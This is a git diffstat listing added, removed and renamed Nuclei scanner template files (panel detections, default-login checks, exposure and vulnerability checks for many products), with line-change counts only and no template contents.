nuclei-templates/Other/self_service.yaml | 20 + nuclei-templates/Other/selfcheck-panel.yaml | 5 +- .../senayan_library_management_system.yaml | 20 + ...id-api(1).yaml => sendgrid-api-11859.yaml} | 0 nuclei-templates/Other/sendgrid-env.yaml | 5 +- .../{nuxt_fs.yaml => sensei-message-wp.yaml} | 0 .../sensitive-storage-data-exposure-1.yaml | 29 + .../sensitive-storage-data-exposure-2.yaml | 29 + .../sensitive-storage-data-exposure-3.yaml | 29 + .../sensitive-storage-data-exposure-4.yaml | 29 + .../sensitive-storage-data-exposure-5.yaml | 29 + .../sensitive-storage-data-exposure-6.yaml | 29 + ...3.yaml => sensitive-storage-exposure.yaml} | 0 nuclei-templates/Other/sensu-panel.yaml | 6 +- .../Other/sentinelone-console.yaml | 9 +- nuclei-templates/Other/sentry-panel.yaml | 10 +- nuclei-templates/Other/seo-by-rank-math.yaml | 4 +- .../Other/seo-redirection-xss.yaml | 16 +- .../Other/seowon-router-rce-10147.yaml | 27 + nuclei-templates/Other/seowon-router-rce.yaml | 31 - .../Other/sequoiadb-default-login-10150.yaml | 45 + .../Other/sequoiadb-default-login.yaml | 43 - ...in.yaml => server-backup-login-10156.yaml} | 0 ...server-backup-manager-se-login-detect.yaml | 22 - .../Other/server-backup-manager-se.yaml | 33 + .../Other/server-monitor-installer.yaml | 5 +- .../Other/server-status-localhost-10165.yaml | 22 + .../Other/server-status-localhost.yaml | 32 - nuclei-templates/Other/server-status.yaml | 7 +- .../Other/servfail-refused-hosts-10167.yaml | 17 + .../Other/servfail-refused-hosts.yaml | 21 - .../Other/service-account-credentials.yaml | 6 +- nuclei-templates/Other/service-pwd.yaml | 10 +- ...aml => servicedesk-login-panel-10173.yaml} | 0 ...servicenow-helpdesk-credential-10175.yaml} | 0 nuclei-templates/Other/servicenow-panel.yaml | 8 +- nuclei-templates/Other/servudaemon-ini.yaml | 42 +- .../Other/set-and-secure-passwords.yaml | 15 +- nuclei-templates/Other/set-hostname.yaml | 7 +- .../Other/setPreferences-xss.yaml | 29 - .../Other/setup-github-enterprise.yaml | 7 +- .../Other/setup-page-exposure.yaml | 3 - .../Other/sevone-nms-network-manager.yaml | 7 +- .../Other/sftp-config-exposure.yaml | 12 +- .../Other/sftp-deployment-config.yaml | 13 +- nuclei-templates/Other/sg-cachepress.yaml | 4 +- nuclei-templates/Other/sg-security.yaml | 4 +- ...-panel.yaml => sgp-login-panel-10185.yaml} | 0 nuclei-templates/Other/shad0w-c2-jarm.yaml | 5 +- nuclei-templates/Other/shadowpad-c2.yaml | 5 +- .../Other/shardingsphere-panel.yaml | 9 +- .../Other/sharecenter-login-10189.yaml | 16 + .../Other/sharecenter-login-10190.yaml | 19 - nuclei-templates/Other/sharefile-panel.yaml | 10 +- nuclei-templates/Other/shell-box.yaml | 10 +- .../Other/shell-history-10191.yaml | 46 + nuclei-templates/Other/shell-history.yaml | 39 - nuclei-templates/Other/shell_scripts.yaml | 8 +- ...pped100-sqli.yaml => shipped100-sqli.yaml} | 0 .../shiro-deserialization-detection.yaml | 19 +- .../Other/shopify-app-installer.yaml | 6 +- .../Other/shopify-custom-token.yaml | 13 - ...199.yaml => shopify-private-token(1).yaml} | 0 .../Other/shopify-public-access.yaml | 5 +- .../Other/shopify-shared-secret(1).yaml | 13 + .../Other/shopify-shared-secret.yaml | 16 - ...10202.yaml => shopify-takeover-10203.yaml} | 0 ...-token.yaml => shoppable-token-10209.yaml} | 0 .../Other/shopware-detect-10213.yaml | 27 + nuclei-templates/Other/shopware-detect.yaml | 32 - nuclei-templates/Other/shopxo.yaml | 22 + nuclei-templates/Other/short-io-takeover.yaml | 30 + nuclei-templates/Other/short-io.yaml | 19 - .../Other/shortcode-lfi-10214.yaml | 26 + nuclei-templates/Other/shortcode-lfi.yaml | 37 - .../Other/shortcodes-ultimate.yaml | 6 +- .../Other/shortpixel-image-optimiser.yaml | 2 +- .../Other/shortpixel-image-optimizer-xss.yaml | 15 +- .../Other/shoutcast-server-10217.yaml | 25 - nuclei-templates/Other/shoutcast-server.yaml | 21 + .../Other/showdoc-default-login-10221.yaml | 38 - .../Other/showdoc-default-login.yaml | 40 + .../Other/showdoc-default-password.yaml | 5 - ...aml => showdoc-file-upload-rce-10226.yaml} | 0 .../Other/sick-beard-xss-10233.yaml | 30 + nuclei-templates/Other/sick-beard-xss.yaml | 28 - nuclei-templates/Other/sicom-panel.yaml | 9 +- .../Other/sidekiq-dashboard-10236.yaml | 19 + nuclei-templates/Other/sidekiq-dashboard.yaml | 26 - nuclei-templates/Other/sigma_wide.yaml | 20 + nuclei-templates/Other/signatures-10259.yaml | 39778 ++++++++ .../{liferay.yaml => signatures-10266.yaml} | 0 nuclei-templates/Other/signatures.yaml | 75690 ++++++++++++---- .../Other/signet-explorer-dashboard.yaml | 6 +- .../Other/silenttrinity-c2-jarm.yaml | 5 +- .../Other/simple-crm-sql-injection-10278.yaml | 30 + .../Other/simple-crm-sql-injection.yaml | 34 - .../Other/simple-custom-post-order.yaml | 2 +- .../Other/simple-employee-rce-10279.yaml | 53 + .../Other/simple-employee-rce.yaml | 41 - .../Other/simple-image-manipulator-lfi.yaml | 13 +- .../Other/simple-page-ordering.yaml | 6 +- .../Other/simplebooklet-takeover.yaml | 5 +- .../Other/site-map-sql-injection.yaml | 40 + .../Other/sitecore-debug-page.yaml | 4 - ...n-10287.yaml => sitecore-login-10289.yaml} | 0 .../Other/sitecore-version-10291.yaml | 26 + nuclei-templates/Other/sitecore-version.yaml | 30 - .../Other/{SiteCore.yaml => sitecore.yaml} | 0 nuclei-templates/Other/siteguard.yaml | 2 +- .../Other/sitemap-sql-injection.yaml | 21 - nuclei-templates/Other/sitemap.yaml | 75 +- .../Other/siteminder-dom-xss.yaml | 7 +- nuclei-templates/Other/siteorigin-panels.yaml | 2 +- nuclei-templates/Other/skeepers-panel.yaml | 6 +- ...4.yaml => skycaiji-admin-panel-10306.yaml} | 0 .../Other/skycaiji-install-10309.yaml | 25 + nuclei-templates/Other/skycaiji-install.yaml | 26 - nuclei-templates/Other/sl-studio-lfi.yaml | 4 - .../Other/slack-access-token.yaml | 8 - .../Other/slack-bot-token-10310.yaml | 18 + .../Other/slack-bot-token-10313.yaml | 18 - nuclei-templates/Other/slims-xss.yaml | 7 +- nuclei-templates/Other/sliver-c2-jarm.yaml | 5 +- ...cum-login.yaml => slocum-login-10317.yaml} | 0 .../Other/slurm-hpc-dashboard.yaml | 15 +- nuclei-templates/Other/smart-slider-3.yaml | 2 +- .../Other/smartbi-default-login.yaml | 13 +- .../Other/smarterstats-setup.yaml | 6 +- .../Other/smartjob-takeover-10324.yaml | 5 +- .../Other/smartling-takeover-10327.yaml | 15 + .../Other/smartling-takeover.yaml | 15 - .../Other/smartping-dashboard.yaml | 10 +- .../Other/smartsense-default-login-10331.yaml | 39 + .../Other/smartsense-default-login.yaml | 38 - .../Other/smartstore-detect-10332.yaml | 8 +- nuclei-templates/Other/smb-detect.yaml | 9 +- nuclei-templates/Other/smb-enum.yaml | 36 +- nuclei-templates/Other/smf-installer.yaml | 5 +- nuclei-templates/Other/sms-installer.yaml | 5 +- nuclei-templates/Other/smtp-detect.yaml | 10 +- nuclei-templates/Other/smtp2go-detect.yaml | 9 +- .../Other/smugmug-takeover-10340.yaml | 16 + nuclei-templates/Other/smugmug-takeover.yaml | 18 - nuclei-templates/Other/snapcomms-panel.yaml | 5 +- nuclei-templates/Other/snapdrop-detect.yaml | 7 +- nuclei-templates/Other/snipeit-panel.yaml | 14 +- ...plets-lfi.yaml => sniplets-lfi-10343.yaml} | 0 ...plets-xss.yaml => sniplets-xss-10344.yaml} | 0 .../snyk-ignore-file-disclosure-10347.yaml | 24 + .../Other/snyk-ignore-file-disclosure.yaml | 21 - nuclei-templates/Other/so-widgets-bundle.yaml | 4 +- .../sofneta-mecdream-pacs-lfi-10351.yaml | 27 + .../Other/sofneta-mecdream-pacs-lfi.yaml | 24 - .../sofneta-mecdream-pacs-server-lfi.yaml | 2 +- .../Other/softether-vpn-panel.yaml | 4 +- nuclei-templates/Other/sogo-detect.yaml | 6 +- .../Other/solar-log-authbypass.yaml | 5 - .../Other/solarview-compact-panel.yaml | 15 +- .../Other/solarview-compact-xss.yaml | 5 +- .../Other/solarwinds-arm-panel.yaml | 10 +- .../Other/solarwinds-default-admin-1.yaml | 38 + .../Other/solarwinds-default-login-10354.yaml | 47 + .../Other/solarwinds-default-login.yaml | 37 - .../Other/solarwinds-orion-10357.yaml | 18 - .../Other/solarwinds-orion-10359.yaml | 17 + ... => solarwinds-servuftp-detect-10360.yaml} | 0 nuclei-templates/Other/solr-exposure.yaml | 6 +- ...{solr-fileRead.yaml => solr-fileread.yaml} | 0 .../Other/solr-panel-exposure.yaml | 15 +- .../Other/solr-query-dashboard-10369.yaml | 6 +- nuclei-templates/Other/solr-rce.yaml | 2 - .../Other/somansa-dlp-detect.yaml | 10 +- ...ogin-10371.yaml => somfy-login-10373.yaml} | 0 nuclei-templates/Other/sonarqube-login.yaml | 5 +- .../Other/sonarqube-public-projects.yaml | 10 +- .../Other/sonarqube-token-10382.yaml | 15 + nuclei-templates/Other/sonarqube-token.yaml | 15 - .../Other/sonic-wall-application.yaml | 12 +- nuclei-templates/Other/sonic-wall-login.yaml | 8 +- .../Other/sonicwall-analyzer-login.yaml | 12 +- .../sonicwall-management-panel-10387.yaml | 17 - .../Other/sonicwall-management-panel.yaml | 15 + ...yaml => sonicwall-sslvpn-panel-10388.yaml} | 0 .../sonicwall-sslvpn-shellshock-10393.yaml | 26 + .../Other/sonicwall-sslvpn-shellshock.yaml | 29 - .../Other/sony-bravia-disclosure.yaml | 6 +- ...ml => sophos-fw-version-detect-10397.yaml} | 0 .../Other/sophos-mobile-panel-detection.yaml | 4 - .../Other/sophos-mobile-panel.yaml | 13 +- .../Other/sophos-web-appliance.yaml | 10 +- .../Other/sound4-directory-listing.yaml | 5 +- .../Other/sound4-file-disclosure.yaml | 7 +- .../Other/spacelogic-cbus-panel.yaml | 10 +- nuclei-templates/Other/spark-panel.yaml | 14 +- .../Other/spark-webui-unauth-10401.yaml | 22 + .../Other/spark-webui-unauth.yaml | 24 - .../Other/spectracom-default-login-10405.yaml | 41 + .../Other/spectracom-default-login.yaml | 36 - nuclei-templates/Other/speedtest-panel.yaml | 5 +- ...er-login.yaml => sphider-login-10408.yaml} | 0 .../Other/sphinxonline-panel.yaml | 5 +- ...spidercontrol-scada-server-info-10411.yaml | 31 + .../spidercontrol-scada-server-info.yaml | 30 - nuclei-templates/Other/spiderfoot.yaml | 8 +- .../Other/splash-render-ssrf.yaml | 4 +- .../Other/splunk-enterprise-login-panel.yaml | 35 - .../Other/splunk-enterprise-panel-10415.yaml | 46 + ...unk-login.yaml => splunk-login-10419.yaml} | 0 nuclei-templates/Other/spnego-detect.yaml | 5 +- nuclei-templates/Other/spon-ip-rce.yaml | 7 +- .../Other/sponip-network-system-ping-rce.yaml | 16 +- .../spoofable-spf-records-ptr-10426.yaml | 9 +- nuclei-templates/Other/spotify.yaml | 34 + .../Other/spotweb-login-panel.yaml | 10 +- nuclei-templates/Other/spring-detect.yaml | 9 +- nuclei-templates/Other/spring-eureka.yaml | 5 +- .../Other/spring-framework-exceptions.yaml | 3 - ...figuration.yaml => spring_collection.yaml} | 0 ...34.yaml => springboot-actuator-10433.yaml} | 0 ...pringboot-actuators-jolokia-xxe-10432.yaml | 31 + .../springboot-actuators-jolokia-xxe.yaml | 28 - .../Other/springboot-auditevents.yaml | 8 +- nuclei-templates/Other/springboot-beans.yaml | 4 - nuclei-templates/Other/springboot-caches.yaml | 6 +- .../Other/springboot-conditions.yaml | 6 +- nuclei-templates/Other/springboot-dump.yaml | 4 - .../Other/springboot-env-10450.yaml | 44 + nuclei-templates/Other/springboot-env.yaml | 41 - .../Other/springboot-exposures.yaml | 2 +- .../Other/springboot-features.yaml | 6 +- nuclei-templates/Other/springboot-flyway.yaml | 6 +- .../Other/springboot-gateway-10453.yaml | 29 + .../Other/springboot-gateway.yaml | 34 - .../Other/springboot-h2-db-rce.yaml | 8 +- .../Other/springboot-health-10459.yaml | 24 + nuclei-templates/Other/springboot-health.yaml | 25 - .../Other/springboot-heapdump-10465.yaml | 25 + .../Other/springboot-httptrace-10467.yaml | 32 + .../Other/springboot-httptrace.yaml | 33 - .../Other/springboot-info-10470.yaml | 36 - .../Other/springboot-info-10471.yaml | 32 + .../Other/springboot-jolokia.yaml | 8 +- .../Other/springboot-liquidbase.yaml | 6 +- .../Other/springboot-log4j-rce-10474.yaml | 62 + .../Other/springboot-log4j-rce.yaml | 47 - .../Other/springboot-logfile.yaml | 6 +- .../Other/springboot-loggerconfig.yaml | 8 +- .../Other/springboot-loggers.yaml | 9 +- .../Other/springboot-metrics-10482.yaml | 32 + .../Other/springboot-scheduledtasks.yaml | 8 +- nuclei-templates/Other/springboot-status.yaml | 8 +- .../Other/springboot-threaddump-10485.yaml | 37 + .../Other/springboot-threaddump.yaml | 32 - .../Other/springboot-trace-10492.yaml | 36 - nuclei-templates/Other/springboot-trace.yaml | 31 + .../Other/springcloud-function-spel-rce.yaml | 6 +- .../Other/sprintful-takeover-10495.yaml | 24 + .../Other/sprintful-takeover.yaml | 29 - nuclei-templates/Other/sql-dump-10496.yaml | 46 + nuclei-templates/Other/sql-dump.yaml | 42 - nuclei-templates/Other/sql-injection.yaml | 94 +- .../Other/sql-server-reporting-10508.yaml | 13 + .../Other/sql-server-reporting.yaml | 16 - nuclei-templates/Other/sqlbuddy-panel.yaml | 9 +- nuclei-templates/Other/sqli-error-based.yaml | 492 - .../squid-analysis-report-generator.yaml | 9 +- ...s.yaml => squirrelmail-add-xss-10515.yaml} | 0 nuclei-templates/Other/squirrelmail-lfi.yaml | 8 +- .../Other/squirrelmail-login-10519.yaml | 26 - .../Other/squirrelmail-login-10521.yaml | 22 + .../Other/squirrelmail-vkeyboard-xss.yaml | 5 - .../Other/sqwebmail-login-panel.yaml | 11 +- nuclei-templates/Other/ssh-auth-methods.yaml | 16 +- ...ys.yaml => ssh-authorized-keys-10523.yaml} | 0 .../Other/ssh-cbc-mode-ciphers.yaml | 14 +- .../Other/ssh-diffie-hellman-logjam.yaml | 11 +- nuclei-templates/Other/ssh-known-hosts.yaml | 4 - nuclei-templates/Other/ssh-password-auth.yaml | 12 +- .../Other/ssh-server-enumeration.yaml | 12 +- .../Other/ssh-sha1-hmac-algo.yaml | 11 +- .../Other/ssh-weak-algo-supported.yaml | 14 +- nuclei-templates/Other/ssh-weak-mac-algo.yaml | 14 +- .../Other/ssh-weak-public-key.yaml | 15 +- .../Other/ssh-weakkey-exchange-algo.yaml | 14 +- .../Other/sshd-dropbear-detect.yaml | 62 +- .../Other/ssl-insecure-content-fixer.yaml | 6 +- .../Other/ssl-network-extender.yaml | 12 +- .../Other/ssrf-via-oauth-misconfig.yaml | 5 +- nuclei-templates/Other/ssrf-via-proxy.yaml | 3 +- nuclei-templates/Other/ssti.yaml | 25 - nuclei-templates/Other/stackhawk-api-key.yaml | 6 +- nuclei-templates/Other/stackoverflow.yaml | 5 +- nuclei-templates/Other/stackposts-sqli.yaml | 7 +- .../Other/stackstorm-default-login-10530.yaml | 41 + .../Other/stackstorm-default-login.yaml | 47 - .../Other/star-network-utility.yaml | 11 +- .../Other/start-element-manager-panel.yaml | 8 +- ... stem-audio-table-private-keys-10534.yaml} | 0 nuclei-templates/Other/stestr-config.yaml | 12 +- .../Other/steve-default-login.yaml | 12 +- nuclei-templates/Other/steve-login-panel.yaml | 12 +- nuclei-templates/Other/steve-xss.yaml | 6 +- nuclei-templates/Other/steve.yaml | 22 + .../stops-core-theme-and-plugin-updates.yaml | 2 +- nuclei-templates/Other/storybook-panel.yaml | 10 +- ...n.yaml => strapi-documentation-10543.yaml} | 0 nuclei-templates/Other/strapi-page.yaml | 6 +- .../Other/{2904374066.yaml => stratum.yaml} | 0 nuclei-templates/Other/streampipes.yaml | 22 + .../Other/strict-transport-security.yaml | 7 +- .../Other/stridercd-detection.yaml | 3 - nuclei-templates/Other/stridercd-panel.yaml | 12 +- .../Other/strikingly-takeover-10551.yaml | 20 + .../Other/strikingly-takeover.yaml | 17 - ...api-key.yaml => stripe-api-key-11869.yaml} | 0 ....yaml => stripe-restricted-key-10555.yaml} | 0 .../Other/stripe-secret-key-10556.yaml | 17 - .../Other/stripe-secret-key-10558.yaml | 15 + nuclei-templates/Other/strong-ciphers.yaml | 5 +- nuclei-templates/Other/structurizr-panel.yaml | 7 +- .../Other/struts-debug-mode-10560.yaml | 5 +- .../Other/struts-ognl-console.yaml | 9 +- .../Other/struts-problem-report-10564.yaml | 20 + .../Other/struts-problem-report.yaml | 19 - .../Other/styleci-yml-disclosure.yaml | 5 +- .../Other/subdomain-takeover-dns-10566.yaml | 52 + .../subdomain-takeover-dns-wildcards.yaml | 48 +- .../Other/subdomain-takeover-dns.yaml | 52 - .../Other/subdomain-takeover.yaml | 387 + .../Other/submitty-login-10568.yaml | 36 + nuclei-templates/Other/submitty-login.yaml | 36 - .../Other/subrion-cms-detect.yaml | 7 +- nuclei-templates/Other/subrion-login.yaml | 19 +- nuclei-templates/Other/sucuri-firewall.yaml | 7 +- nuclei-templates/Other/sucuri-scanner.yaml | 2 +- nuclei-templates/Other/sugarcrm-panel.yaml | 7 +- .../Other/suitecrm-installer.yaml | 5 +- .../Other/sumowebtools-installer.yaml | 5 +- .../Other/sunbird-dcim-panel.yaml | 5 +- .../Other/sungrow-logger1000-detect.yaml | 9 +- .../Other/superadmin-ui-panel.yaml | 9 +- .../Other/supermicro-bmc-panel.yaml | 9 +- .../Other/supermicro-default-login.yaml | 14 +- .../Other/superset-default-login.yaml | 8 - nuclei-templates/Other/superset-login.yaml | 24 +- nuclei-templates/Other/supershell-c2.yaml | 6 +- .../Other/supershell-default-login.yaml | 31 +- ...n-panel.yaml => supervpn-panel-10575.yaml} | 0 ...akeover.yaml => surge-takeover-10579.yaml} | 0 .../Other/surrealtodo-lfi-10580.yaml | 5 +- .../Other/surveygizmo-takeover-10584.yaml | 7 +- .../Other/surveysparrow-takeover.yaml | 8 +- .../suspicious-sql-error-messages-10585.yaml | 8 +- nuclei-templates/Other/svg-support.yaml | 2 +- nuclei-templates/Other/svn-wc-db.yaml | 12 +- ...config.yaml => svnserve-config-10590.yaml} | 0 .../Other/swag-instance-default-page.yaml | 8 +- nuclei-templates/Other/swagger-api-10593.yaml | 28 + nuclei-templates/Other/swagger-api-11.yaml | 30 + nuclei-templates/Other/swagger-version.yaml | 25 +- nuclei-templates/Other/sxf-filedownload.yaml | 4 +- nuclei-templates/Other/sym404.yaml | 4 - .../Other/symantec-dlp-login-10596.yaml | 24 - .../Other/symantec-dlp-login.yaml | 21 + .../Other/symantec-epm-login-10602.yaml | 20 + .../Other/symantec-epm-login.yaml | 21 - .../Other/symantec-ewep-login-10603.yaml | 24 - .../Other/symantec-ewep-login.yaml | 20 + .../Other/symantec-iam-console.yaml | 11 +- .../Other/symantec-messaging-gateway.yaml | 19 + .../Other/symantec-pgp-global-directory.yaml | 4 - .../Other/symantec-phishing-panel.yaml | 5 +- ...aml => symfony-database-config-10615.yaml} | 0 nuclei-templates/Other/symfony-debug.yaml | 14 +- nuclei-templates/Other/symfony-debugmode.yaml | 7 +- .../Other/symfony-fosjrouting-bundle.yaml | 8 +- nuclei-templates/Other/symfony-fragment.yaml | 39 +- .../Other/symfony-profiler-10625.yaml | 17 + nuclei-templates/Other/symfony-profiler.yaml | 19 - .../Other/symfony-properties-ini.yaml | 6 +- nuclei-templates/Other/symfony-security.yaml | 6 +- nuclei-templates/Other/symfonyrce.yaml | 22 + .../Other/synapse-mobility-panel.yaml | 9 +- nuclei-templates/Other/syncserver-panel.yaml | 10 +- .../Other/syncthing-dashboard.yaml | 8 +- .../Other/syncthru-web-service.yaml | 14 +- .../Other/synology-web-station.yaml | 4 - .../Other/synopsys-coverity-panel.yaml | 7 +- .../Other/system-properties-exposure.yaml | 5 +- .../Other/szhe-default-login-10636.yaml | 42 + .../Other/szhe-default-login.yaml | 41 - nuclei-templates/Other/t24.yaml | 20 + .../Other/table-of-contents-plus.yaml | 2 +- .../Other/tableau-panel-10641.yaml | 25 - .../Other/tableau-panel-10642.yaml | 21 + .../Other/tableau-server-detect-10643.yaml | 36 - .../Other/tableau-server-detect.yaml | 31 + .../Other/tableau-service-manager.yaml | 14 +- nuclei-templates/Other/tablepress.yaml | 4 +- .../Other/tabnabbing-check-10646.yaml | 25 + nuclei-templates/Other/tabnabbing-check.yaml | 22 - nuclei-templates/Other/tailon-panel.yaml | 4 +- .../Other/tamronos-rce-10651.yaml | 19 + nuclei-templates/Other/tamronos-rce.yaml | 24 - .../Other/tamronos-user-creation.yaml | 18 +- nuclei-templates/Other/tamronos.yaml | 22 + .../Other/tar-path-overwrite.yaml | 17 +- ...a-lfi.yaml => targa-camera-lfi-10654.yaml} | 0 .../Other/tasmota-config-webui.yaml | 5 +- nuclei-templates/Other/tasmota-install.yaml | 5 +- nuclei-templates/Other/tautulli-panel.yaml | 8 +- nuclei-templates/Other/tautulli-unauth.yaml | 8 +- .../Other/tave-takeover-10660.yaml | 18 + nuclei-templates/Other/tave-takeover.yaml | 15 - .../Other/taxonomy-terms-order.yaml | 2 +- nuclei-templates/Other/tcp.yaml | 25 + .../{tcpconfig.yaml => tcpconfig-10665.yaml} | 0 .../Other/teamcity-guest-login-enabled.yaml | 7 +- .../Other/teamcity-login-panel.yaml | 23 +- .../Other/teamcity-registration-enabled.yaml | 5 +- nuclei-templates/Other/teampass-panel.yaml | 13 +- nuclei-templates/Other/teamwork-takeover.yaml | 7 +- ...ech-detect.yaml => tech-detect-10673.yaml} | 0 ....yaml => tectuus-scada-monitor-10679.yaml} | 0 .../Other/tekon-info-leak-10684.yaml | 31 + nuclei-templates/Other/tekon-info-leak.yaml | 40 - nuclei-templates/Other/tekton-dashboard.yaml | 9 +- .../Other/telecom-gateway-default-login.yaml | 18 +- nuclei-templates/Other/telegram-token.yaml | 5 +- nuclei-templates/Other/telegram.yaml | 41 +- ...> telerik-dialoghandler-detect-10691.yaml} | 0 .../telerik-fileupload-detect-10693.yaml | 13 + .../telerik-fileupload-detect-10696.yaml | 17 - .../Other/telerik-server-login.yaml | 11 +- .../Other/telerik_report_server.yaml | 20 + nuclei-templates/Other/telnet-detect.yaml | 10 +- nuclei-templates/Other/teltonika-login.yaml | 15 +- nuclei-templates/Other/tembosocial-panel.yaml | 10 +- nuclei-templates/Other/temenos-t24-login.yaml | 9 +- .../tenda-11n-wireless-router-login.yaml | 13 +- nuclei-templates/Other/tenda-web-master.yaml | 9 +- nuclei-templates/Other/teradek-panel.yaml | 5 +- .../Other/teradici-pcoip-10703.yaml | 23 - .../Other/teradici-pcoip-10704.yaml | 19 + .../Other/teradici-pcoip-panel.yaml | 11 +- ...etect.yaml => terraform-detect-10707.yaml} | 0 .../terraform-enterprise-panel-10712.yaml | 27 + .../Other/terraform-enterprise-panel.yaml | 25 - nuclei-templates/Other/testrail-install.yaml | 5 +- nuclei-templates/Other/text-injection.yaml | 2 +- .../Other/the-events-calendar.yaml | 2 +- .../Other/themeisle-companion.yaml | 6 +- .../Other/thinfinity-virtualui-panel.yaml | 4 - nuclei-templates/Other/thinkCMF_include.yaml | 2 - .../thinkcmf-arbitrary-code-execution.yaml | 4 - .../Other/thinkcmf-detection-10719.yaml | 20 + .../Other/thinkcmf-detection.yaml | 23 - .../Other/thinkcmf-lfi-10721.yaml | 26 + nuclei-templates/Other/thinkcmf-lfi.yaml | 37 - .../Other/thinkcmf-rce-10728.yaml | 27 - .../Other/thinkcmf-rce-10729.yaml | 23 + ...0730.yaml => thinkcmf-workflow-10731.yaml} | 0 ...ect.yaml => thinkific-redirect-10734.yaml} | 0 .../Other/thinkphp-2-rce-10738.yaml | 22 + .../Other/thinkphp-2-rce-10741.yaml | 27 - .../Other/thinkphp-501-rce-10743.yaml | 28 - nuclei-templates/Other/thinkphp-501-rce.yaml | 24 + .../Other/thinkphp-5022-rce-10744.yaml | 27 + .../Other/thinkphp-5022-rce-10747.yaml | 27 - .../Other/thinkphp-5023-rce-10748.yaml | 32 + nuclei-templates/Other/thinkphp-5023-rce.yaml | 32 - ...kphp-509-information-disclosure-10752.yaml | 26 - ...kphp-509-information-disclosure-10753.yaml | 22 + ...tq-login-10756.yaml => threatq-login.yaml} | 0 nuclei-templates/Other/thruk-detect.yaml | 4 - nuclei-templates/Other/thruk-xss.yaml | 3 +- .../Other/tianqing-info-leak-10765.yaml | 37 + .../Other/tianqing-info-leak.yaml | 33 - .../Other/tictail-takeover-10768.yaml | 17 + nuclei-templates/Other/tictail-takeover.yaml | 18 - nuclei-templates/Other/tidb-unauth.yaml | 12 +- .../Other/tigase-xmpp-server.yaml | 5 +- .../Other/tikiwiki-cms-10775.yaml | 19 + nuclei-templates/Other/tikiwiki-cms.yaml | 23 - nuclei-templates/Other/tikiwiki-json-rpc.yaml | 44 - ...10778.yaml => tikiwiki-reflected-xss.yaml} | 0 nuclei-templates/Other/tikiwiki-xss.yaml | 8 +- ...akeover.yaml => tilda-takeover-10782.yaml} | 0 .../Other/tileserver-gl-10786.yaml | 33 - .../Other/tileserver-gl-10787.yaml | 29 + .../tiny-file-manager-default-login.yaml | 10 +- nuclei-templates/Other/tiny-file-manager.yaml | 21 +- .../Other/tiny-rss-installer.yaml | 5 +- nuclei-templates/Other/tinyfilemanager.yaml | 20 + nuclei-templates/Other/tinymce-advanced.yaml | 4 +- nuclei-templates/Other/tlr-2005ksh-login.yaml | 12 +- nuclei-templates/Other/tls-sni-proxy.yaml | 9 +- nuclei-templates/Other/token-info-json.yaml | 6 +- nuclei-templates/Other/token-json.yaml | 6 +- .../Other/tomcat-cookie-exposed.yaml | 5 +- .../Other/tomcat-default-login-10788.yaml | 18 +- .../Other/tomcat-detect-10794.yaml | 31 + nuclei-templates/Other/tomcat-detect.yaml | 36 - .../Other/tomcat-examples-login.yaml | 44 - .../tomcat-examples-login_CVE-2022-34305.yaml | 49 + .../Other/tomcat-exposed-docs.yaml | 12 +- .../Other/tomcat-manager-default.yaml | 40 +- .../tomcat-manager-pathnormalization-1.yaml | 29 + .../tomcat-manager-pathnormalization-2.yaml | 29 + ... => tomcat-manager-pathnormalization.yaml} | 0 ...scripts.yaml => tomcat-scripts-10802.yaml} | 0 .../Other/tongda-action-uploadfile.yaml | 10 +- .../Other/tongda-path-traversal.yaml | 9 +- .../Other/tongda-session-disclosure.yaml | 6 +- nuclei-templates/Other/tongda_sqli2022.yaml | 4 +- .../Other/tooljet-default-login.yaml | 5 +- nuclei-templates/Other/tooljet-panel.yaml | 10 +- nuclei-templates/Other/tooljet.yaml | 20 + .../Other/top-xss-params-10807.yaml | 81 + nuclei-templates/Other/top-xss-params.yaml | 75 - nuclei-templates/Other/topsec-topacm-rce.yaml | 44 + ...-proxy-10811.yaml => tor-socks-proxy.yaml} | 0 .../Other/tornado-server-login.yaml | 9 +- .../Other/toshiba-topaccess-webserver.yaml | 6 +- nuclei-templates/Other/total-web-10816.yaml | 22 - .../Other/total-web-solutions-panel.yaml | 9 +- nuclei-templates/Other/total-web.yaml | 20 + nuclei-templates/Other/totemomail-detect.yaml | 4 - nuclei-templates/Other/totemomail-panel.yaml | 15 +- nuclei-templates/Other/tox-ini.yaml | 14 +- ... => tpshop-directory-traversal-10822.yaml} | 0 nuclei-templates/Other/traccar.yaml | 20 + ...10826.yaml => trace-axd-detect-10825.yaml} | 0 .../Other/trace-method-10829.yaml | 27 + nuclei-templates/Other/trace-method.yaml | 26 - nuclei-templates/Other/tracer-sc-login.yaml | 5 - .../Other/traefik-dashboard-10832.yaml | 15 + nuclei-templates/Other/traefik-dashboard.yaml | 17 - .../Other/translatepress-multilingual.yaml | 2 +- .../Other/transmission-dashboard.yaml | 13 +- .../Other/travis-ci-disclosure.yaml | 6 +- .../Other/trendnet-tew827dru-login.yaml | 13 +- .../Other/trilithic-viewpoint-default.yaml | 39 - .../Other/trilithic-viewpoint-login.yaml | 33 + nuclei-templates/Other/triton-lite.yaml | 59 + .../Other/truenas-scale-panel.yaml | 10 +- .../Other/tufin-securetrack-login.yaml | 13 +- .../Other/tugboat-config-exposure-10843.yaml | 33 - .../Other/tugboat-config-exposure-10844.yaml | 28 + .../Other/tumblr-takeover-10846.yaml | 24 + nuclei-templates/Other/tumblr-takeover.yaml | 27 - nuclei-templates/Other/tup-openframe.yaml | 5 +- .../Other/turbo-website-installer.yaml | 5 +- .../Other/turbocrm-xss-10848.yaml | 24 + .../Other/turbocrm-xss-10850.yaml | 31 - nuclei-templates/Other/turbomeeting.yaml | 20 + nuclei-templates/Other/turnkey-openvpn.yaml | 9 +- ...=> tuxedo-connected-controller-10852.yaml} | 0 nuclei-templates/Other/tweaker5.yaml | 59 + .../Other/twig-php-ssti-10858.yaml | 26 - .../Other/twig-php-ssti-10859.yaml | 22 + nuclei-templates/Other/twilio-api-10860.yaml | 16 - nuclei-templates/Other/twilio-api-10861.yaml | 13 + .../Other/twitter-secret-11870.yaml | 13 + nuclei-templates/Other/twitter-secret.yaml | 16 - nuclei-templates/Other/twitter.yaml | 41 +- ...rprint.yaml => txt-fingerprint-10863.yaml} | 0 nuclei-templates/Other/typo3-composer.yaml | 7 +- nuclei-templates/Other/typo3-debug-mode.yaml | 5 +- nuclei-templates/Other/typo3-installer.yaml | 5 +- .../Other/uberflip-takeover-10864.yaml | 18 - nuclei-templates/Other/uberflip-takeover.yaml | 16 + .../Other/ucmdb-default-login-10869.yaml | 33 - .../Other/ucmdb-default-login.yaml | 35 + nuclei-templates/Other/ulanzi-clock.yaml | 6 +- .../Other/ultimate-addons-for-gutenberg.yaml | 4 +- 